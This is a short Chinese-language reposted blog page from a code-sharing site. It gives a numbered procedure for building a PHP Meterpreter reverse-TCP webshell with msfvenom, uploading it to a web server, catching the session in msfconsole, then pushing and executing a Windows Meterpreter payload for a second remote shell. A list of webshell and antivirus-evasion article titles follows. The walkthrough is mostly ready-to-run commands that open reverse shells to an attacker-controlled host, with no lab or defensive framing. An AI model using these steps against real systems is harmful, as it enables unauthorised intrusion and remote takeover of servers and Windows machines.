php Meterpreter Webshell - 代码天地

php Meterpreter Webshell

编程语言 2018-05-11 23:03:00 阅读次数: 1

1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set LHOST Attacker's_IP
6. set LPORT 443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时，攻击者可以得到一个meterpreter session
11.打开一个终端，然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole，设置multi/handler，paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session

猜你喜欢

转载自j4s0nh4ck.iteye.com/blog/2156831

php Meterpreter Webshell

PHP webshell

关于PHP中的webshell

浅析PHP-webshell

MySQL获取PHP webshell

【webshell分析】PHP大马分析

几种好用的经典webshell（php）

用ZendGuard 加密php webshell

PHP-WebShell-Bypass-WAF

webshell

Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter

PHP反序列化漏洞与Webshell

利用php自包含特性上传webshell

初探机器学习检测 PHP Webshell

PHP安全之webshell和后门检测

PHP7.1后webshell免杀

最新绕过D盾的php Webshell

菜刀连接PHP WebShell返回200错误

利用PHP的特性做免杀Webshell

无敌强大的Shell脚本查杀各种PHP后门和Webshell

【PHP-CTF】无字母无数字webshell

PHP不包括字母,数字和下划线的webshell

php一句话获取webshell代码

【转】PHP利用Apache、Nginx的特性实现免杀Webshell

PHP利用Apache、Nginx的特性实现免杀Webshell

php代码审计--无数字字母构造webshell

Mysql+PHP手工获取webshell

PHP文件包含漏洞利用phpinfo写入webshell

渗透测试-php-RCE+Struts2拿webshell

二进制加密PHP Webshell原理及简单实现

今日推荐

周排行

深度学习------Lingvo框架下的加速通道GPipe

webjars管理静态资源

C专家编程_2.2

mysql 源码安装

json文件操作

123231432

注解的实现

Spring MVC 控制器

《人月神话》读后感二

C#使用HttpWebRequest和HttpWebResponse上传文件示例

每日归档

更多

2024-09-08(0)

2024-09-07(0)

2024-09-06(0)

2024-09-05(0)

2024-09-04(0)

2024-09-03(0)

2024-09-02(0)

2024-09-01(0)

2024-08-31(0)

2024-08-30(0)